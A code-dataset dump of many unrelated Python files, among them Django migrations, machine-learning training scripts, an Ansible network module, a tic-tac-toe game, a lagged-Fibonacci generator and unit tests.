vbsfile = scres.split(":")[2].strip() # ignore spaces around filename
if vbsfile[-2]=="_":
# Multi-file name, ignore the suffix for the initial pattern
vbsfile = vbsfile[:-2]
print("Processing VBS name " + vbsfile)
#vbsname = "testrec_freja_210526_161523"
# Prepare plot
f,axs = plt.subplots(nrows, ncols, sharex=True, figsize=(8,4), dpi=300)
for a in axs:
for b in a:
b.set_yscale("log")
b.yaxis.set_major_locator(plt.NullLocator())
b.yaxis.set_minor_locator(plt.NullLocator())
b.xaxis.set_major_locator(plt.NullLocator())
b.xaxis.set_minor_locator(plt.NullLocator())
# Remove top double line except from top row
if not b in axs[0]:
b.spines["top"].set_visible(False)
plt.subplots_adjust(left=0.125, right=0.975, top=0.925, bottom=0.05, hspace=0, wspace=0)
# Check if dealing with single-file. If so, vmux, then read all data sequentially and split
singlefile, nbbcs, data, start_time = get_singlefile_data(vbsfile)
if not singlefile:
recmode = "multifile"
# Failed single-file, try multi-file:
for nif in ifs2plot:
nbbcs, data, start_time = get_multifile_data(vbsfile, nif)
if nbbcs>0: #Check if data was found
for i in range(nbbcs):
bbc = nbbcs*nif + i
# Slice out bbc from all data
bbcdata = data[:, i].astype(int) # bbc, converted to 4 integer states (2-bit): -3, -1, +1, +3
plot_bbc(bbcdata, bbc, nif)
else:
# Singlefile, so step through all BBCs, assuming bbcperif BBCs for each IF
recmode = "vmuxed"
for bbc in range(nbbcs):
nif = int(bbc/bbcsperIF)
# Slice out bbc from all data
bbcdata = data[:, bbc].astype(int) # bbc, converted to 4 integer states (2-bit): -3, -1, +1, +3
plot_bbc(bbcdata, bbc, nif)
f.suptitle(vbsfile+": " + recmode + ", "+extractiontime + ". log10 spectra: {} points per {} MHz. Blue/green = sampler stats.".format(nspec,bbcw))
f.savefig(scriptdir+"/bandpass.pdf",dpi=300)
|
8,007 | 9dfbf14a2005aad87be82e5e482c6b0347f32f2c | # Generated by Django 3.2.9 on 2021-11-10 13:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('settings', '0003_auto_20210814_2246'),
]
operations = [
migrations.AlterField(
model_name='building',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='group',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='lessontype',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='other',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='patterns',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='room',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='roomtype',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='salary',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='staff',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='student',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='subjects',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='teacherrole',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='teachertypes',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='timetable',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='userprofile',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
|
8,008 | 1825b365032a224ed56a1814d7f6457e2add8fdd | import csv
with open('healthviolations.csv', 'w') as fp:
with open('Restaurant_Inspections.csv', 'rb') as csvfile:
reader = csv.reader(csvfile)
header = next(reader, None)
writer = csv.writer(fp, delimiter=',')
writer.writerow([header[0], "violation"])
for row in reader:
if (row[20] != '') :
violationarr = row[20].split(",")
for violation in violationarr :
writer.writerow([row[0], violation])
# writer.writerow([header[0], header[1], "violation"])
# writer.writerow([row[0], row[1], violation])
|
8,009 | 7789e54acc02fe0277ff80ce14efbcdc4ee6e7f1 | import gym
import random
import numpy as np
import statistics
from collections import Counter
import tflearn
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.estimator import regression
#setup the Cartpole environment
env = gym.make("CartPole-v0")
env.reset()
#----------Explore CartPole-------------#
#exploring the observations, rewards, actions
def explore_cartpole():
for i_episode in range(2):
observation = env.reset()
for t in range(100):
env.render()
print(observation)
action = env.action_space.sample()
observation, reward, done, info = env.step(action)
print("Action: ", action, "Rewards", reward)
if done:
print("Episode finished after {} timesteps".format(t+1))
break
#explore_cartpole()
#----------Collect Training Data-------------#
#collect data from successful games by running x games
#successful would be say, lasting more than 100 frames
num_games = 20000
num_episodes = 201 #game would end at 200 episodes
min_score = 75
def initial_games():
train_data = []
train_scores = []
#running our initial set of games
for _ in range(num_games):
game_data = []
prev_obs = []
score = 0
#running the game, frame by frame
for _ in range(num_episodes):
#choosing actions: randomly
action = random.randrange(0,2)
observation, reward, done, info = env.step(action)
if len(prev_obs) > 0:
game_data.append([prev_obs, action])
prev_obs = observation
score += reward
if done:
#print("Score was: ", score)
break
#if the score was above the threshold
#we will save the game in our training data
#hence training on the better games
if score >= min_score :
train_scores.append(score)
#converting the data into one-hot output
for i in game_data:
if i[1] == 0:
output = [1, 0]
else:
output = [0, 1]
train_data.append([i[0], output])
env.reset()
return train_data
#----------Build the FC NN model-------------#
#building a simple multi-layer fully connected model
#this model can be generally used to play games like cartpole
#would try training the model on other games in OpenAI environment
def nn_model(input_size):
network = input_data(shape=[None, input_size, 1], name='input')
network = fully_connected(network, 128, activation='relu')
network = dropout(network, 0.8)
network = fully_connected(network, 256, activation='relu')
network = dropout(network, 0.8)
network = fully_connected(network, 512, activation='relu')
network = dropout(network, 0.8)
network = fully_connected(network, 256, activation='relu')
network = dropout(network, 0.8)
network = fully_connected(network, 128, activation='relu')
network = dropout(network, 0.8)
network = fully_connected(network, 2, activation='softmax')
network = regression(network, optimizer='adam', learning_rate=1e-3, loss='categorical_crossentropy', name='targets')
model = tflearn.DNN(network, tensorboard_dir='log')
return model
#----------Train the model-------------#
def train_model(train_data, model=False):
x = np.array([i[0] for i in train_data]).reshape(-1, len(train_data[0][0]),1)
y = [i[1] for i in train_data]
if not model:
model = nn_model(input_size = len(x[0]))
model.fit({'input': x}, {'targets': y}, n_epoch = 5, snapshot_step=500,
show_metric = True, run_id = 'openai_learning')
return model
train_data = initial_games()
#print("Size of training data",len(train_data))
model = train_model(train_data)
#----------Predict actions for the games-------------#
num_final_games = 10
target_episodes = 201
all_rewards = []
all_actions = []
for _ in range(num_final_games):
total_score = 0
prev_obs = []
env.reset()
for _ in range(target_episodes):
#env.render()
#instead of randomly choosing the action, predict the actions
if len(prev_obs) == 0:
action = random.randrange(0,2)
else:
action = np.argmax(model.predict(prev_obs.reshape(-1,len(prev_obs),1))[0])
all_actions.append(action)
#let's run the game
observation, reward, done, info = env.step(action)
prev_obs = observation
total_score += reward
if done:
break
all_rewards.append(total_score)
#----------Print results-------------#
print('Average reward:',np.mean(all_rewards), '+-', np.std(all_rewards))
print('Max reward:', max(all_rewards))
|
8,010 | 3e7df9a733c94b89d22d10883844c438444d5e2c | from __future__ import unicode_literals
from django.db import models
from django.db.models.signals import post_save
from django.contrib.auth.models import User
from django.dispatch import receiver
PROFILE_PIC_PATH = 'users/profile_pic'
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
bio = models.TextField(max_length=500, blank=True)
image = models.ImageField(null=True, blank=True, upload_to=PROFILE_PIC_PATH)
birth_date = models.DateField(null=True, blank=True)
|
8,011 | 746971cd6c5bf65268e89303c8f4ce98a56eb111 | #!/usr/bin/env python2
# -*- coding: utf8 -*-
from __future__ import print_function, division, absolute_import
from flask.ext.login import current_user
from . import cert_record_process as record_process_base
from walis.thirdparty import thrift_client, thirdparty_svc
from walis.exception.util import raise_user_exc
from walis.exception.error_code import CERT_UPDATE_ERR
TRestaurantCertification = thirdparty_svc.ers.TRestaurantCertification
CERTIFICATION_TYPE_NONE = 0
RESTAURANT_NOT_EXIST_ID = -1
CERTIFICATION_NOT_EXIST = -2
CertType = thirdparty_svc.ers.CertificationConst
STATUS_PENDING = CertType.STATUS_PENDING
STATUS_PASSED = CertType.STATUS_PASSED
STATUS_FAILED = CertType.STATUS_FAILED
TYPE_CERT_PERSONAL = thirdparty_svc.ers.RestaurantConst.CERTIFICATION_TYPE_PERSONAL
TYPE_CERT_CORP = thirdparty_svc.ers.RestaurantConst.CERTIFICATION_TYPE_CORP
def get(restaurant_id):
with thrift_client('ers') as ers:
cert = ers.get_restaurant_certification(restaurant_id)
cert.comment = cert.comment.encode('utf-8')
return cert
def get_by_status(status, offset=0, limit=thirdparty_svc.ers.MAX_LIST_SIZE):
limit = 250
with thrift_client('ers') as ers:
return ers.query_restaurant_certification_by_status(
status, offset, limit)
def add(cert):
with thrift_client('ers') as ers:
ers.add_restaurant_certification(cert)
record_process_base.add(
cert.restaurant_id,
cert.type,
CERTIFICATION_NOT_EXIST,
STATUS_PENDING,
comment='上传个人认证信息' if cert.type ==
TYPE_CERT_PERSONAL else '上传企业认证信息')
return ''
def update(cert):
with thrift_client('ers') as ers:
db_cert = ers.get_restaurant_certification(cert.restaurant_id)
if not db_cert:
raise_user_exc(CERT_UPDATE_ERR, restaurant_id=cert.restaurant_id)
with thrift_client('ers') as ers:
ers.update_restaurant_certification(cert)
record_process_base.add(
cert.restaurant_id,
cert.type,
cert.status,
STATUS_PENDING,
comment='修改认证信息')
return ''
def process_certification(restaurant_id, status_to):
with thrift_client('ers') as ers:
ers.process_certification(current_user.id,
restaurant_id, status_to)
def get_latest_record(restaurant_id):
nopass_record = record_process_base.get_latest_record(
restaurant_id)
comment = ''
cert_status = CERTIFICATION_NOT_EXIST
if nopass_record:
comment = nopass_record.comment
cert_status = nopass_record.status_to
return comment, cert_status
|
8,012 | 99b5ac74da95dff399c31d58e19bac65e538a34b | def main():
' main entry point for module execution\n '
argument_spec = dict(src=dict(type='path'), replace_src=dict(), lines=dict(aliases=['commands'], type='list'), parents=dict(type='list'), before=dict(type='list'), after=dict(type='list'), match=dict(default='line', choices=['line', 'strict', 'exact', 'none']), replace=dict(default='line', choices=['line', 'block', 'config']), running_config=dict(aliases=['config']), intended_config=dict(), defaults=dict(type='bool', default=False), backup=dict(type='bool', default=False), save_when=dict(choices=['always', 'never', 'modified'], default='never'), diff_against=dict(choices=['running', 'startup', 'intended']), diff_ignore_lines=dict(type='list'), save=dict(default=False, type='bool', removed_in_version='2.4'), force=dict(default=False, type='bool', removed_in_version='2.2'))
argument_spec.update(nxos_argument_spec)
mutually_exclusive = [('lines', 'src', 'replace_src'), ('parents', 'src'), ('save', 'save_when')]
required_if = [('match', 'strict', ['lines']), ('match', 'exact', ['lines']), ('replace', 'block', ['lines']), ('replace', 'config', ['replace_src']), ('diff_against', 'intended', ['intended_config'])]
module = AnsibleModule(argument_spec=argument_spec, mutually_exclusive=mutually_exclusive, required_if=required_if, supports_check_mode=True)
warnings = list()
nxos_check_args(module, warnings)
result = {
'changed': False,
'warnings': warnings,
}
config = None
info = get_capabilities(module).get('device_info', {
})
os_platform = info.get('network_os_platform', '')
if (module.params['replace'] == 'config'):
if ('9K' not in os_platform):
module.fail_json(msg='replace: config is supported only for Nexus 9K series switches')
if module.params['replace_src']:
if (module.params['replace'] != 'config'):
module.fail_json(msg='replace: config is required with replace_src')
if (module.params['backup'] or (module._diff and (module.params['diff_against'] == 'running'))):
contents = get_config(module)
config = NetworkConfig(indent=2, contents=contents)
if module.params['backup']:
result['__backup__'] = contents
if any((module.params['src'], module.params['lines'], module.params['replace_src'])):
match = module.params['match']
replace = module.params['replace']
candidate = get_candidate(module)
if ((match != 'none') and (replace != 'config')):
config = get_running_config(module, config)
path = module.params['parents']
configobjs = candidate.difference(config, match=match, replace=replace, path=path)
else:
configobjs = candidate.items
if configobjs:
commands = dumps(configobjs, 'commands').split('\n')
if module.params['before']:
commands[:0] = module.params['before']
if module.params['after']:
commands.extend(module.params['after'])
result['commands'] = commands
result['updates'] = commands
if (not module.check_mode):
load_config(module, commands)
result['changed'] = True
running_config = None
startup_config = None
diff_ignore_lines = module.params['diff_ignore_lines']
if module.params['save']:
module.params['save_when'] = 'always'
if (module.params['save_when'] != 'never'):
output = execute_show_commands(module, ['show running-config', 'show startup-config'])
running_config = NetworkConfig(indent=1, contents=output[0], ignore_lines=diff_ignore_lines)
startup_config = NetworkConfig(indent=1, contents=output[1], ignore_lines=diff_ignore_lines)
if ((running_config.sha1 != startup_config.sha1) or (module.params['save_when'] == 'always')):
result['changed'] = True
if (not module.check_mode):
cmd = {
'command': 'copy running-config startup-config',
'output': 'text',
}
run_commands(module, [cmd])
else:
module.warn('Skipping command `copy running-config startup-config` due to check_mode. Configuration not copied to non-volatile storage')
if module._diff:
if (not running_config):
output = execute_show_commands(module, 'show running-config')
contents = output[0]
else:
contents = running_config.config_text
running_config = NetworkConfig(indent=1, contents=contents, ignore_lines=diff_ignore_lines)
if (module.params['diff_against'] == 'running'):
if module.check_mode:
module.warn('unable to perform diff against running-config due to check mode')
contents = None
else:
contents = config.config_text
elif (module.params['diff_against'] == 'startup'):
if (not startup_config):
output = execute_show_commands(module, 'show startup-config')
contents = output[0]
else:
contents = output[0]
contents = startup_config.config_text
elif (module.params['diff_against'] == 'intended'):
contents = module.params['intended_config']
if (contents is not None):
base_config = NetworkConfig(indent=1, contents=contents, ignore_lines=diff_ignore_lines)
if (running_config.sha1 != base_config.sha1):
if (module.params['diff_against'] == 'intended'):
before = running_config
after = base_config
elif (module.params['diff_against'] in ('startup', 'running')):
before = base_config
after = running_config
result.update({
'changed': True,
'diff': {
'before': str(before),
'after': str(after),
},
})
module.exit_json(**result) |
8,013 | 841743d4e9d683827962d83a77a87c6432842add | import tkinter as tk
from functools import partial
from numpy import random
from base import NinePalaceGame
class SingleMode(NinePalaceGame):
player1 = player = 'O'
player2 = computer = 'X'
def __init__(self):
self.create_choose_one_window()
super().__init__()
self.main_game_window.mainloop()
def player_play(self, i, j):
if not self.game_is_over and not self.box[i][j]:
self.box[i][j] = 1
self.value_group[i][j].set(self.dominance)
self.dominance = self.computer
return 1
return 0
def computer_play(self):
if not self.game_is_over:
while 1:
i, j = random.choice(range(3)), random.choice(range(3))
if not self.box[i][j]:
self.box[i][j] = 1
self.value_group[i][j].set(self.computer)
self.dominance = self.player
break
def judge(self):
if self.check_win(self.player):
self.game_is_over = 1
self.billboard_value.set('Player is win!')
elif self.check_win(self.computer):
self.game_is_over = 1
self.billboard_value.set('Computer is win!')
elif self.check_game_over():
self.game_is_over = 1
self.billboard_value.set('Game over!')
def reset(self):
super().reset()
self.dominance = self.player
self.box = [
[0, 0, 0], [0, 0, 0], [0, 0, 0]]
self.main_game_window.withdraw()
self.choose_one_window.update()
self.choose_one_window.deiconify()
def button_function(self, i, j):
if self.player_play(i, j):
self.judge()
self.computer_play()
self.judge()
def set_O_or_X(self, use):
self.player = use
if use == 'X':
self.computer = 'O'
self.computer_play()
else:
self.computer = 'X'
self.dominance = self.player
self.choose_one_window.withdraw()
self.main_game_window.update()
self.main_game_window.deiconify()
def create_choose_one_window(self):
self.choose_one_window = tk.Toplevel(self.main_game_window)
self.choose_one_window.title('choose one window')
self.choose_one_window.geometry('500x500')
choose_one_window_billboard = tk.StringVar(
master=self.choose_one_window, value='Choose you want')
use_O_or_X = tk.Label(self.choose_one_window, bg='yellow', width=50,
height=5, textvariable=choose_one_window_billboard)
use_O_or_X.pack()
use_O = tk.Button(self.choose_one_window, text='I want use O', width=40,
height=5, command=partial(self.set_O_or_X, 'O'))
use_O.pack()
use_X = tk.Button(self.choose_one_window, text='I want use X', width=40,
height=5, command=partial(self.set_O_or_X, 'X'))
use_X.pack()
if __name__ == '__main__':
game = SingleMode()
|
8,014 | c04c38d78144b6f5d3e5af4ebe9ce430e882a367 | import numpy as np
def get_train_batches(data_dir='/home/yunhan/batchified'):
"""
return a list or generator of (large) ndarrays,
in order to efficiently utilize GPU
"""
# todo: read in data that is preoprocessed
# Use batch 1 - 52 as train (60%), 53 - 71 as validation (20%), 72 - 89 as test (20%)
n = 53
idx = np.random.permutation(n)
idx = idx + 1
for i in range(n):
X = np.load("%s/X%d.npy" % (data_dir, idx[i]))/255.
Y = np.load("%s/y%d.npy" % (data_dir, idx[i])).reshape(-1)
yield X, Y
def get_evaluate_batches(data_dir='/home/yunhan/batchified'):
"""
return a list or generator of (large) ndarrays,
in order to efficiently utilize GPU
"""
# train 3 valid 1
# Use batch 1 - 53 as train (60%), 54 - 71 as validation (20%), 72 - 89 as test (20%)
n = 18
idx = np.random.permutation(n)
idx = idx + 54
for i in range(n):
X = np.load("%s/X%d.npy" % (data_dir, idx[i]))/255.
Y = np.load("%s/y%d.npy" % (data_dir, idx[i])).reshape(-1)
yield X, Y
def get_test_batches(data_dir='/home/yunhan/batchified'):
"""
return a list or generator of (large) ndarrays,
in order to efficiently utilize GPU
"""
# train 3 valid 1
# Use batch 1 - 53 as train (60%), 54 - 71 as validation (20%), 72 - 89 as test (20%)
n = 18
idx = np.random.permutation(n)
idx = idx + 72
for i in range(n):
X = np.load("%s/X%d.npy" % (data_dir, idx[i]))/255.
Y = np.load("%s/y%d.npy" % (data_dir, idx[i])).reshape(-1)
yield X, Y
def get_batches_mono(data_dir):
"""
return a list or generator of (large) ndarrays,
in order to efficiently utilize GPU
"""
X = np.load('/home/yunhan/data_dir/train_x_224.npy')
# X = np.load('train_x_sample.npy')
X = X / 255
# X = np.load('/home/yunhan/data_dir/train_x_224.npy')
Y = np.load('/home/yunhan/data_dir/train_y_224.npy')
# Y = np.load('train_y_sample.npy')
return [(X, Y, 32, 0.2), ]
def get_test_data_batches(data_dir='/home/yunhan/data_dir'):
for i in range(17):
X = np.load("%s/X_%d.npy" % (data_dir, 3000*(i+1)))/255.
yield X
|
8,015 | fe82a46a7965b27729ff5bd61c1059416c96cae7 | print("""Hello world""")
print("Hello again")
print('Hello again') |
8,016 | 108c8bbb4d3dbc6b7f32e084b13009296b3c5a80 | import serial
import time
def main():
# '/dev/tty****' is your port ID
con=serial.Serial('/dev/tty****', 9600)
print('connected.')
while 1:
str=con.readline() # byte code
print (str.strip().decode('utf-8')) # decoded string
if __name__ == '__main__':
main()
|
8,017 | 62ca95a871c16191fb8f56213646e8173f400630 | import streamlit as st
st.write('hi') |
8,018 | a1c5d86a3f042d9e5ba522726191c8aeb9b738ed | import os
from dataclasses import dataclass
from dotenv import load_dotenv
from fastapi.security import OAuth2PasswordBearer
from passlib.context import CryptContext
load_dotenv()
@dataclass
class Settings:
SECRET_KEY = os.getenv("SECRET_KEY", "mysecret")
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 30
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="token")
settings = Settings()
|
8,019 | 8cfab525ab3a86dd6964475d5621fdc7c6413e38 | """Secret Garden tests."""
from secret_garden import Decoder, SecretGarden
import random
filename = "pr08_example_data.txt"
key = "Fat Chocobo"
d = Decoder(filename, key)
s = SecretGarden(filename, key)
def test_read_from_file():
"""
Test of function of reading data from file.
:return:
"""
reading_file = d.read_code_from_file()
assert type(reading_file) == list
assert len(reading_file) == 7
assert "\n" not in d.read_code_from_file()
def test_decode_from_base64():
"""
Test of function of decoding messages from base64 to utf-8.
:return:
"""
list_to_be_checked = []
list_of_truth = [")-.7)-AOO", "-57)-0JASJAOOASJ", ")07)2AJSAJAJOAJJAAO", ".7)/AJSSAJSJOOSSOOOS",
"-,70", ",7)-,OAASSOSOAAASAAAAA", ".7).SOSAOJAOOO"]
for x in d.read_code_from_file():
list_to_be_checked.append(d.decode_from_base64(x))
assert list_to_be_checked == list_of_truth
def test_calculate_cipher_step():
"""
Test of function of calculating the cipher step.
:return:
"""
given_value = d.calculate_cipher_step()
assert type(given_value) == int
assert given_value == 1016
new_decoder = Decoder(filename, "HELLO THERE!")
new_value = new_decoder.calculate_cipher_step()
assert new_value != given_value
random_number = random.Random()
assert given_value != random_number
def test_decode():
"""
Test of function of decoding.
:return:
"""
decoding = d.decode()
assert type(decoding) == list
assert len(decoding) == 7
assert decoding[0] == '-12;-1\n\nESS'
assert decoding[-1] == '2;-2\n\nWSWESNESSS'
for x in decoding:
assert "\n" in x
def test_decode_messages():
"""
Test of function of decoding messages in SecretGarden class.
:return:
"""
decoding1 = d.decode()
decoding2 = s.decode_messages()
assert decoding1 == decoding2
decoding3 = SecretGarden(filename, "HELLO, STUDENTS.").decode_messages()
assert decoding1 != decoding3
def test_find_secret_locations():
"""
Test of function of finding secret locations in SecretGarden class.
:return:
"""
list_of_random = [(random.Random(), random.Random()), (random.Random(), random.Random()), (random.Random(),
random.Random()),
(random.Random(), random.Random()), (random.Random(), random.Random()),
(random.Random(), random.Random()), (random.Random(), random.Random())]
list_of_truth = [(-11, -3), (20, -13), (1, -3), (-2, -5), (10, 4), (6, -13), (2, -6)]
secrets = s.find_secret_locations()
assert type(secrets) == list
for x in secrets:
assert type(x) == tuple
assert secrets == list_of_truth
assert list_of_random != secrets
assert len(list_of_random) == len(secrets)
|
8,020 | 2a3f9c4518df337cfc5e4b1816e7b2b4af62c101 | #!/usr/bin/env python3
import unittest
import solution
class TestMethods(unittest.TestCase):
def LinkedListFromArray(self, values):
if len(values) > 0:
headNode = solution.ListNode(values[0], None)
tailPtr = headNode
if len(values) > 1:
for value in values[1:]:
tailPtr.setNext(solution.ListNode(value))
tailPtr = tailPtr.getNext()
return headNode
else:
return None
def printLinkedList(self, headNode):
print(self.linkedListToArray(headNode))
def linkedListToArray(self, headNode):
result = []
current = headNode
while current:
result.append(current.getValue())
current = current.getNext()
return result
def checkLinkedListsAreEqual(self, headNodeA, headNodeB):
valuesA = self.linkedListToArray(headNodeA)
valuesB = self.linkedListToArray(headNodeB)
return valuesA == valuesB
def test_example_1(self):
sol = solution.Solution();
l1 = self.LinkedListFromArray([2, 4, 3])
l2 = self.LinkedListFromArray([5, 6, 4])
expected = [7, 0, 8]
self.assertEqual(self.linkedListToArray(sol.addTwoNumbers(l1, l2)), expected)
def test_example_steve7411(self):
sol = solution.Solution();
l1 = self.LinkedListFromArray([9])
l2 = self.LinkedListFromArray([1])
expected = [0, 1]
self.assertEqual(self.linkedListToArray(sol.addTwoNumbers(l1, l2)), expected)
def test_example_2(self):
sol = solution.Solution();
l1 = self.LinkedListFromArray([0])
l2 = self.LinkedListFromArray([0])
expected = [0]
self.assertEqual(self.linkedListToArray(sol.addTwoNumbers(l1, l2)), expected)
def test_example_2(self):
sol = solution.Solution();
l1 = self.LinkedListFromArray([9,9,9,9,9,9,9])
l2 = self.LinkedListFromArray([9,9,9,9])
expected = [8,9,9,9,0,0,0,1]
self.assertEqual(self.linkedListToArray(sol.addTwoNumbers(l1, l2)), expected)
if __name__ == '__main__':
unittest.main()
|
8,021 | 3f4b05a1d0c4c2a2b085a0265bafbf89b5635e31 | import pandas as pd
import statistics
import csv
df = pd.read_csv("height-weight.csv")
heightlist = df["Height(Inches)"].to_list()
weightlist = df["Weight(Pounds)"].to_list()
heightmean = statistics.mean(heightlist)
heightmedian = statistics.median(heightlist)
heightmode = statistics.mode(heightlist)
heightstdev = statistics.stdev(heightlist)
print(heightmean)
print(heightmedian)
print(heightmode)
print(heightstdev)
firststart = heightmean - heightstdev
firstend = heightmean + heightstdev
secondstart = heightmean - 2*heightstdev
secondend = heightmean + 2*heightstdev
thirdstart = heightmean - 3*heightstdev
thirdend = heightmean + 3*heightstdev
first = [result for result in heightlist if result > firststart and result < firstend]
second = [result for result in heightlist if result > secondstart and result < secondend]
third = [result for result in heightlist if result > thirdstart and result < thirdend]
firstpercentage = len(first)* 100 / len(heightlist)
secondpercentage = len(second)* 100 / len(heightlist)
thirdpercentage = len(third)* 100 / len(heightlist)
print(firstpercentage)
print(secondpercentage)
print(thirdpercentage)
|
8,022 | b137fc40a5b2dec63c7abb6953664a969f5c126f | def equals(left, right, tol=0.001):
"""
Tests equality of left and right
Rosalind allows for a default [absolute] error of 0.001 in decimal
answers unless otherwise stated.
"""
try:
left = left.strip()
right = right.strip()
except AttributeError:
pass
try:
left = float(left)
right = float(right)
return abs(left - right) <= tol
except ValueError:
return left == right
def all_equals(solution1, solution2, tol=0.001):
"""
Tests equality of all tokens in two solutions.
Rosalind allows for a default [absolute] error of 0.001 in all decimal
answers unless otherwise stated.
"""
tokens1 = solution1.split()
tokens2 = solution2.split()
for token1, token2 in zip(tokens1, tokens2):
if not equals(token1, token2, tol=tol):
print(token1, token2)
return False
return True
|
8,023 | 11e9d25c30c8c9945cfa3c234ffa1aab98d1869e | from math import gcd
from random import randint, choice
task = """6. Реализовать алгоритм построения ПСП методом Фиббоначи с
запаздываниями. Обосновать выбор коэффициентов алгоритма. Для
начального заполнения использовать стандартную линейную конгруэнтную
ПСП с выбранным периодом. Реализовать возможность для пользователя
вводить коэффициенты заранее."""
def factor(n):
result = []
d = 2
while d * d <= n:
if n % d == 0:
result.append(d)
n //= d
else:
d += 1
if n > 1:
result.append(n)
return result
def get_coeff(period):
c = randint(0, period)
while gcd(c, period) != 1:
c += 1
b = 2
a = None
factor_result = factor(period)
while b <= period:
if all([b % p == 0 for p in factor_result]):
if period % 4 == 0:
if b % 4 == 0:
a = b + 1
break
else:
a = b + 1
break
b += 1
return a, c, randint(2, period)
def gen_linear_congruential(period):
coeff_a, coeff_c, x0 = get_coeff(period)
result = [x0]
for i in range(1, period):
result.append((coeff_a * result[i - 1] + coeff_c) % period)
return result
def LFG(init, lst, m, count):
result = init.copy()
for i in range(len(init), count):
result.append(sum([result[len(result) - j] for j in lst]) % (2 ** m))
return result
delays = input("Параметры запаздывания: ")
if not delays:
# y = x^k + x^j + 1 must be primitive
delays = choice([[7, 10], [5, 17], [24, 55], [65, 71], [128, 159]])
k = delays[1] + 10
m = 8
print(f"delays = {delays}, k = {k}, m = {m}")
else:
delays = [int(item) for item in delays.split()]
k = int(input("Длина начального заполнения: "))
m = int(input("Модуль: "))
initial_filling = gen_linear_congruential(k)
print(LFG(initial_filling, delays, m, 1000))
|
8,024 | fbfc1749252cf8cbd9f8f72df268284d3e05d6dc | def regexp_engine(pattern, letter):
return pattern in ('', '.', letter)
def match_regexp(pattern, substring):
if not pattern: # pattern is empty always True
return True
if substring: # if string is not empty try the regexp engine
if regexp_engine(pattern[0], substring[0]): # if reg and letter match
return match_regexp(pattern[1:], substring[1:])
return False # if reg and letter not match or string has been consumed
def regexp(pattern, word):
# check if word is empty but catch the condition ' | '
if not word and pattern:
return False
# if string is not empty so feeds params into regexp match
if not match_regexp(pattern, word):
# if regexp return False, try to cut the word
return regexp(pattern, word[1:])
return True
print(regexp(*(input().split('|')))) |
8,025 | 46a3c3777d90976c7d39772d2e94430506d3acd7 | """
Day 2
"""
with open('input.txt', 'r') as f:
lines = f.read()
lines = lines.split('\n')[:-1]
lines = [l.split(' ') for l in lines]
valid = 0
new_valid = 0
for cur_pw in lines:
letter = cur_pw[1].strip(':')
amount = cur_pw[2].count(letter)
rule = cur_pw[0].split('-')
rule = [int(r) for r in rule]
if amount >= rule[0] and amount <= rule[1]:
valid += 1
occurences = cur_pw[2][rule[0] - 1] + cur_pw[2][rule[1] - 1]
if occurences.count(letter) == 1:
new_valid += 1
print(valid)
print(new_valid)
|
8,026 | fc89fdf17f887ea398be5b36d4d6f0444d64b3e0 | """script for subpixel experiment (not tested)
"""
import numpy as np
from tqdm import tqdm
import logging
from pathlib import Path
import paddle
import paddle.optimizer
import paddle.io
from utils.loader import dataLoader
from utils.loader import modelLoader
from utils.loader import pretrainedLoader
from utils.tools import dict_update
from utils.utils import labels2Dto3D
from utils.utils import flattenDetection
from utils.utils import labels2Dto3D_flattened
from utils.utils import pltImshow
from utils.utils import saveImg
from utils.utils import precisionRecall_torch
from utils.utils import save_checkpoint
@paddle.no_grad()
class Val_model_subpixel(object):
def __init__(self, config, device='gpu', verbose=False):
self.config = config
self.model = self.config['name']
self.params = self.config['params']
self.weights_path = self.config['pretrained']
self.device = device
pass
def loadModel(self):
from utils.loader import modelLoader
self.net = modelLoader(model=self.model, **self.params)
checkpoint = paddle.load(self.weights_path)
self.net.load_dict(checkpoint['model_state_dict'])
self.net = self.net.to(self.device)
logging.info('successfully load pretrained model from: %s',
self.weights_path)
pass
def extract_patches(self, label_idx, img):
from utils.losses import extract_patches
patch_size = self.config['params']['patch_size']
patches = extract_patches(label_idx.to(self.device),
img.to(self.device),
patch_size=patch_size)
return patches
pass
def run(self, patches):
with paddle.no_grad():
pred_res = self.net(patches)
return pred_res
pass
if __name__ == '__main__':
filename = 'configs/magicpoint_repeatability.yaml'
import yaml
device = 'cuda' if paddle.is_compiled_with_cuda() else 'cpu'
device = device.replace('cuda', 'gpu')
device = paddle.set_device(device)
paddle.set_default_dtype('float32')
with open(filename, 'r') as f:
config = yaml.load(f, Loader=yaml.FullLoader)
task = config['data']['dataset']
from utils.loader import dataLoader_test as dataLoader
data = dataLoader(config, dataset='hpatches')
